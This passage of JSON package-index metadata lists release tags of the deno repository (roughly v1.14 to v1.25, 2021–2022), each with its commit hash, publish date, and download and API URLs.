/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1